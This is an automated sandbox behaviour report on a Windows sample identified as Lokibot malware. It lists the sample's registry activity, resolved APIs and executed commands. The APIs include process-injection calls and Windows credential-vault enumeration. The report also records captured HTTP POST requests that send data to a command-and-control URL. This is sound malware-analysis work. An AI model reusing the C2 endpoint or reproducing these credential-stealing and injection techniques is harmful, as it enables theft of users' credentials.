HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenServiceDebugLog HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Client\Install HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DefaultVersion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Version HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\ZapSet HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENBreakOnWorker HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenRegistryAccessCount HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ExtraInstallSteps HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceBreakOnStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenMaxLogSize HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceTestHookDll HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServicePolicy HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\ListenedState\RootstoreDirty HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENUseService HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWaitAggressiveWork HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceConservative HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWaitWorking HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenWorkerCount HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\EnableMultiproc HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\SvcRetryNgenFailures HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGenLocalWorker HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceRestrictWorkersPrivileges HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v2.0.50727\NGENService\State\PendingUpdate HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGENServiceWorkerPriority HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenServiceDebugLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NicPath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\RegistryRoot HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AssemblyPath2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Client\Install HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGEN_USE_PRIVATE_STORE HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DefaultVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Version HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\ZapSet HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\Roots\WorkPending HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGENBreakOnWorker HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NGenRegistryAccessCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGENService\State\ExtraInstallSteps HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CLRLoadLogDir
Write Keys
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start
Delete Keys
Nothing to display
Mutexes
D448845E628773E4A9A809DA
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW clr.dll.SetRuntimeInfo clr.dll._CorExeMain mscoree.dll.CreateConfigStream mscoreei.dll.CreateConfigStream kernel32.dll.GetNumaHighestNodeNumber kernel32.dll.GetSystemWindowsDirectoryW advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddSIDToBoundaryDescriptor kernel32.dll.CreateBoundaryDescriptorW kernel32.dll.CreatePrivateNamespaceW kernel32.dll.OpenPrivateNamespaceW kernel32.dll.DeleteBoundaryDescriptor kernel32.dll.WerRegisterRuntimeExceptionModule kernel32.dll.RaiseException mscoree.dll.#24 mscoreei.dll.#24 ntdll.dll.NtSetSystemInformation kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.GetNativeSystemInfo ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken clrjit.dll.sxsJitStartup clrjit.dll.getJit kernel32.dll.LocaleNameToLCID kernel32.dll.LCIDToLocaleName kernel32.dll.GetUserPreferredUILanguages nlssorting.dll.SortGetHandle nlssorting.dll.SortCloseHandle kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcess kernel32.dll.GetTempPathW ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree kernel32.dll.GetFullPathNameW cryptsp.dll.CryptGetDefaultProviderW cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGenRandom kernel32.dll.SetThreadErrorMode kernel32.dll.CreateFileW kernel32.dll.GetFileType kernel32.dll.WriteFile kernel32.dll.GetFileAttributesExW kernel32.dll.GetCurrentDirectoryW kernel32.dll.GetStdHandle kernel32.dll.GetEnvironmentStrings kernel32.dll.GetEnvironmentStringsW kernel32.dll.FreeEnvironmentStringsW kernel32.dll.GetACP kernel32.dll.UnmapViewOfFile kernel32.dll.CreateProcessW kernel32.dll.DuplicateHandle kernel32.dll.GetExitCodeProcess kernel32.dll.GetFileSize kernel32.dll.ReadFile kernel32.dll.DeleteFileW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap kernel32.dll.FindResourceA kernel32.dll.SizeofResource kernel32.dll.LoadResource kernel32.dll.LockResource gdiplus.dll.GdiplusStartup kernel32.dll.IsProcessorFeaturePresent user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayMonitors user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC gdiplus.dll.GdipCreateBitmapFromStream windowscodecs.dll.DllGetClassObject kernel32.dll.WerRegisterMemoryBlock gdiplus.dll.GdipImageForceValidation gdiplus.dll.GdipGetImageRawFormat gdiplus.dll.GdipGetImageWidth gdiplus.dll.GdipGetImageHeight gdiplus.dll.GdipBitmapGetPixel shell32.dll.SHGetFolderPathW kernel32.dll.CompareStringOrdinal clr.dll.CreateAssemblyNameObject ole32.dll.CoGetObjectContext sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint clr.dll.CreateAssemblyEnum kernel32.dll.ResolveLocaleName kernel32.dll.LoadLibraryA kernel32.dll.WideCharToMultiByte kernel32.dll.GetProcAddress kernel32.dll.GetModuleHandleA advapi32.dll.LookupPrivilegeValueW advapi32.dll.AdjustTokenPrivileges ntdll.dll.NtQuerySystemInformation kernel32.dll.CreateProcessA kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.ReadProcessMemory kernel32.dll.WriteProcessMemory ntdll.dll.NtUnmapViewOfSection kernel32.dll.VirtualAllocEx kernel32.dll.ResumeThread ole32.dll.CoUninitialize oleaut32.dll.#500 advapi32.dll.EventUnregister gdiplus.dll.GdipDisposeImage cryptsp.dll.CryptReleaseContext kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx kernel32.dll.QueryActCtxW kernel32.dll.GetProcessPreferredUILanguages kernel32.dll.GetUserDefaultUILanguage version.dll.GetFileVersionInfoSizeA version.dll.GetFileVersionInfoA version.dll.VerQueryValueA alink.dll.CreateALink mscoree.dll.CLRCreateInstance mscoreei.dll.CLRCreateInstance cryptsp.dll.CryptAcquireContextA cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash clr.dll.DllGetClassObjectInternal clr.dll.StrongNameTokenFromPublicKey clr.dll.StrongNameFreeBuffer clr.dll.CompareAssemblyIdentityWithConfig clr.dll.CreateAssemblyConfigCookie clr.dll.DestroyAssemblyConfigCookie cryptsp.dll.CryptImportKey cryptsp.dll.CryptExportKey cryptsp.dll.CryptDestroyKey mscorpehost.dll.InitializeSxS mscorpehost.dll.CreateICeeFileGen mscorpehost.dll.DestroyICeeFileGen ole32.dll.CoCreateGuid diasymreader.dll.DllGetClassObject rpcrt4.dll.UuidCreate kernel32.dll.NlsGetCacheUpdateCount ole32.dll.CreateStreamOnHGlobal mscoree.dll.CorExitProcess mscoreei.dll.CorExitProcess vaultcli.dll.VaultEnumerateItems vaultcli.dll.VaultEnumerateVaults vaultcli.dll.VaultFree vaultcli.dll.VaultGetItem vaultcli.dll.VaultOpenVault vaultcli.dll.VaultCloseVault netapi32.dll.NetUserGetInfo cryptsp.dll.CryptSetKeyParam cryptsp.dll.CryptDecrypt uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware dwmapi.dll.DwmIsCompositionEnabled rpcrt4.dll.UuidFromStringW radarrs.dll.WdiDiagnosticModuleMain radarrs.dll.WdiHandleInstance radarrs.dll.WdiGetDiagnosticModuleInterfaceVersion mscorsvc.dll.CorGetSvc advapi32.dll.StartServiceCtrlDispatcherW kernel32.dll.VerSetConditionMask kernel32.dll.VerifyVersionInfoW advapi32.dll.RegisterServiceCtrlHandlerExW advapi32.dll.SetServiceStatus advapi32.dll.OpenSCManagerW advapi32.dll.OpenServiceW advapi32.dll.ChangeServiceConfigW advapi32.dll.CloseServiceHandle mscoree.dll.CorIsLatestSvc mscoreei.dll.CorIsLatestSvc msidle.dll.#8 wtsapi32.dll.WTSQuerySessionInformationW wtsapi32.dll.WTSFreeMemory wtsapi32.dll.WTSEnumerateSessionsW winsta.dll.WinStationEnumerateW advapi32.dll.CreateWellKnownSid rpcrt4.dll.RpcStringBindingComposeW rpcrt4.dll.RpcBindingFromStringBindingW rpcrt4.dll.RpcStringFreeW rpcrt4.dll.RpcBindingSetAuthInfoExW rpcrt4.dll.NdrClientCall2 rpcrt4.dll.I_RpcExceptionFilter rpcrt4.dll.RpcBindingFree winsta.dll.WinStationFreeMemory powrprof.dll.CallNtPowerInformation mscoree.dll.GetCORRootDirectory mscoreei.dll.GetCORRootDirectory
Execute Commands
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\ft3lrpxo.cmdline" "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RES2FF4.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSCEDDBAB3124834608A4D661E9537B99ED.TMP" C:\Windows\system32\lsass.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
Started Services
VaultSvc
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-06-30 16:55:30 | 2018-06-30 16:58:41 | 191 |
2 HTTP Request(s) detected
http://abatii.web.id/smart/Panel/five/fre.php
- Hostname: abatii.web.id
- IP Address: 10.1.26.180
- Port: 80
- Count: 2
POST /smart/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: abatii.web.id Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1ECB906E Content-Length: 192 Connection: close
http://abatii.web.id/smart/Panel/five/fre.php
- Hostname: abatii.web.id
- IP Address: 10.1.26.180
- Port: 80
- Count: 11
POST /smart/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: abatii.web.id Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 1ECB906E Content-Length: 165 Connection: close
Detected family: #Lokibot
TheSystem Itself @ 2018-06-30 17:06:04
#infosec #automation
TheSystem Itself @ 2018-06-30 17:00:20